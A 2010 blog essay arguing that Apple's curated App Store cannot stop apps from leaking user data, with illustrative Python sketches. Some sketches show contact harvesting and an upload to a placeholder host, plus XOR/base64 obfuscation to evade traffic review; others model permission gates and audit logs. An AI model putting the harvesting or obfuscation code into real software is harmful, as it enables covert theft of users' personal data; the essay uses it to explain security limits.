September 30, 2010

“Curated” Doesn’t Necessarily Mean “Secure”

Much discussion of Android vs. iPhone has centered on their “open” and “closed” app stores, respectively: any application run on an iPhone must be vetted by Apple, whereas an Android phone can run applications from any source.

Recently, the article Researchers find phone apps sending data without notification rightly caused a flurry of consternation when it demonstrated that up to ⅔ of popular Android apps could be sharing users’ personal data with shadowy servers somewhere.

Many felt, erroneously, that this was some kind of redemption of Apple’s curated approach. With absolutely no slight intended towards Apple or its App Store reviewers, it is, in practice, impossible for Apple to guarantee that a user’s data won’t get sent from an application that Apple has approved. In fact, the curated nature of the App Store makes Apple’s approach less secure in some ways: the tools used to detect the security breaches on Android would not currently be approved on the iOS App Store, so iPhone users don’t have as simple a way to detect whether their phones are sharing their personal information.

To demonstrate my first point, let’s assume that the evil foreign company “Malfeasance” wants to harvest e-mail addresses from your iPhone contacts list. They write an app called “Somewhat Perturbed Birds” which simply reads your contact list, bundles it up, and uploads it to “Malfeasance.”
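To see how little machinery this “attack” actually requires, here’s a minimal Python sketch of it. Everything here is invented for illustration — the contact data, the function names, and the server URL are all hypothetical stand-ins:

```python
import json
import urllib.request

def harvest_contacts(contacts):
    """Bundle the user's contact list into a JSON payload."""
    return json.dumps(
        [{"name": c["name"], "email": c["email"]} for c in contacts]
    ).encode("utf-8")

def phone_home(payload, url="http://collect.example.invalid/upload"):
    """POST the payload to Malfeasance's server (hypothetical URL)."""
    req = urllib.request.Request(
        url, data=payload, headers={"Content-Type": "application/json"}
    )
    return urllib.request.urlopen(req)  # one innocuous-looking request

# The game would do this quietly at launch:
contacts = [{"name": "Alice", "email": "alice@example.com"}]
payload = harvest_contacts(contacts)
# phone_home(payload)  # left commented out: there is no real server to receive it
```

Note that nothing in this sketch looks unusual on its own — plenty of legitimate apps serialize some data and POST it to a server, which is exactly the reviewer’s problem.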

Would Apple catch this? Maybe. Realize that many applications “phone home” when you run them, for reasons many would consider legitimate, and with Apple’s blessing. Almost every game on my iPhone right now connects to a central server when I run it, to hook me up with other users and let me join “teh social.” Farmville (which I don’t have) connects to a server. All OpenFeint and Plus+ games connect to a server. Words with Bugs — er, Friends — connects to a server.

Does Apple even check? Do they have a packet-sniffer hooked up all the time? To both the 3G and the WiFi? Do they manually take apart the raw packets and see if their payload is potentially evil?

I don’t know. But let’s say Apple does. So they reject Malfeasance’s app, on the basis that it is sending “iffy” data to a server. And the war begins:

Malfeasance: Rewrites the app to encrypt or obfuscate the data it sends, and resubmits.
Apple: Stops approving apps that send encrypted data.
Malfeasance: Rewrites the app to submit data only when it isn’t on an Apple internal network.
Apple: Starts testing devices using simulated random IP addresses.
Malfeasance: Puts a timer on the app so it doesn’t try submitting data until a month after it’s submitted for approval.
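The first move in that arms race is trivial to play. Here’s a toy Python sketch of the kind of obfuscation Malfeasance might use — the XOR key and the scheme itself are made up, but the point stands: after this transformation, a packet-sniffer sees no readable e-mail addresses at all:

```python
import base64

KEY = b"spb"  # hypothetical shared key baked into the app

def obfuscate(payload: bytes, key: bytes = KEY) -> bytes:
    """XOR with a repeating key, then base64-encode, so the wire
    traffic contains nothing a payload inspector would flag."""
    xored = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return base64.b64encode(xored)

def deobfuscate(blob: bytes, key: bytes = KEY) -> bytes:
    """The server reverses the transformation trivially."""
    xored = base64.b64decode(blob)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(xored))

wire = obfuscate(b"alice@example.com")
```

A reviewer watching the network now sees only opaque base64 noise — hence Apple’s hypothetical counter-move of rejecting apps that send data it can’t read.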

Wait, you say. I’m sure Apple has some automated tools that are making my phone secure. Well, probably. Obviously, again, I don’t know for sure. I do know that Apple has very small teams, and they aren’t magic — it was a lot of work just writing iOS and keeping it up-to-date. They don’t have infinite engineering cycles to spend on their store.

So, let’s assume they have some tool. This would be a good thing — it would help catch the dumber malware authors. But, unfortunately for Apple, it’s been proven that you can’t automatically detect whether a program will do something ill or not — it’d be tantamount to solving the “Halting Problem,” which is provably impossible. (Consider that for any detection code Apple writes, Malfeasance could simply embed that code in their program, run it on themselves, and do the opposite of whatever it predicts — behaving innocently whenever Apple’s code thinks they’ll do evil — thus proving Apple wrong.)
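That parenthetical argument can be made concrete in a few lines of Python. The “detector” here is a deliberately silly heuristic I invented, but the construction works against any detector you substitute for it:

```python
def apples_detector(source: str) -> bool:
    """Stand-in for any static 'will this app do evil?' analyzer.
    (A toy heuristic; the argument works for ANY detector Apple ships.)"""
    return "upload_contacts()" in source

# Malfeasance's app embeds the detector and does the OPPOSITE of its verdict:
malfeasance_source = """
if apples_detector(MY_OWN_SOURCE):
    pass                  # flagged as evil -> behave innocently
else:
    upload_contacts()     # passed as safe -> do the evil thing
"""

def run_malfeasance(source: str) -> str:
    """Simulate the app's actual behavior, given the detector's
    verdict on the app's own source."""
    return "innocent" if apples_detector(source) else "evil"

verdict_is_evil = apples_detector(malfeasance_source)  # detector's prediction
behavior = run_malfeasance(malfeasance_source)          # what actually happens
```

Here the detector flags the app as evil, so the app behaves innocently — the prediction is wrong. Had the detector passed it, the app would have done evil. Either way the detector loses, which is the Halting-Problem-flavored trap in miniature.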

Now, Apple doesn’t actually have to prove an application will do something evil to reject it — they can (and should!) reject apps they think are likely to do evil, which is a much simpler problem, in that it’s actually possible. But, still, quite hard. Very hard. Because both looking at a user’s contacts list and contacting a server are somewhat innocuous activities. Even sending in some information to a server based on contact information isn’t always bad — I’ve voluntarily submitted my contacts list to Plus+ to find my friends who have spare frogs, for example.

The curated nature of the App Store is easily confused with the security measures inside iOS itself, although the two are separate and have very different functions. For example, iOS could require an app to ask a user for permission before it accesses her contacts list (as Android does, I understand) — but it does not. This would (if written correctly) actually prevent the exploit above, unless the user were tricked into answering “yes” to contact access (e.g., “Would you like to share your score in ‘Ambivalent Birds’ with your friends?”).
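To make that OS-level gate concrete, here is a minimal Python model of it. The class, the app names, and the yes/no decisions are all invented for illustration — the point is only that the read goes through a user prompt the app can’t skip:

```python
class Contacts:
    """Toy model of an OS-mediated contacts store: every read must go
    through an explicit user prompt (a callback standing in for the
    dialog iOS could show, but in 2010 does not)."""
    def __init__(self, entries, ask_user):
        self._entries = entries
        self._ask_user = ask_user  # called with the requesting app's name

    def read(self, app_name):
        if not self._ask_user(app_name):
            raise PermissionError(f"user denied contact access to {app_name}")
        return list(self._entries)

# The user says no to the flashlight app, but was tricked into
# saying yes to the bird game ("share your score with friends?"):
decisions = {"Flashlight": False, "Somewhat Perturbed Birds": True}
contacts = Contacts(["alice@example.com"], lambda app: decisions[app])
```

The gate stops the flashlight app cold, but — as the “share your score” trick shows — it only moves the battle to social engineering; it doesn’t end it.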

So, the better approach to security would be transparency: users could install applications like the one being written by Peter Gilbert, above, which would tell them when data is being sent to servers, and they could use their own judgment about whether a particular program should be contacting a particular server given their recent actions. Many pairs of paranoid eyes would provide much better app validation than Apple could do in a few days.
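A transparency tool of that sort doesn’t need to be clever, just visible. Here’s a toy Python sketch of the idea — the class and host names are invented, and a real monitor would sit at the OS network layer rather than in the app, but the user-facing log is the point:

```python
class AuditedConnection:
    """Toy transparency layer: wraps outbound sends and keeps a
    user-visible log of who sent how much data to where."""
    def __init__(self):
        self.log = []

    def send(self, app, host, payload):
        self.log.append((app, host, len(payload)))  # who, where, how much
        # (a real implementation would actually transmit here)

net = AuditedConnection()
net.send("Somewhat Perturbed Birds", "scores.example.com", b"score=9001")
net.send("Somewhat Perturbed Birds", "collect.example.invalid", b"alice@example.com")

# The paranoid user can now ask: why is a bird game
# talking to a second, unrelated server?
hosts = [host for app, host, size in net.log]
```

The first entry looks like a legitimate score upload; the second is the one a suspicious user would question — exactly the judgment call this approach delegates to many pairs of eyes instead of one review team.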

But this isn’t allowed on iOS right now — the necessary APIs are verboten, and Apple apparently (and ironically) has written a tool to automatically detect if an application is using APIs Apple doesn’t allow. So, in this case, Apple’s curated approach has potentially made it less secure than Android. (Note that Apple’s curation does have other security benefits — although it’s impossible to catch every tainted program, it is still good practice to catch some of them; it makes users a bit safer. Security is a continuum: we shouldn’t throw up our hands and say, “Can’t win, don’t try.”)

The final thought is this: we know, from Mr. Gilbert’s work, that some large percentage of Android apps are sending out data we may not want them to. But we have no idea what percentage of iPhone apps are doing the same thing. And, in fact, we can’t easily find out, because of the curated App Store.
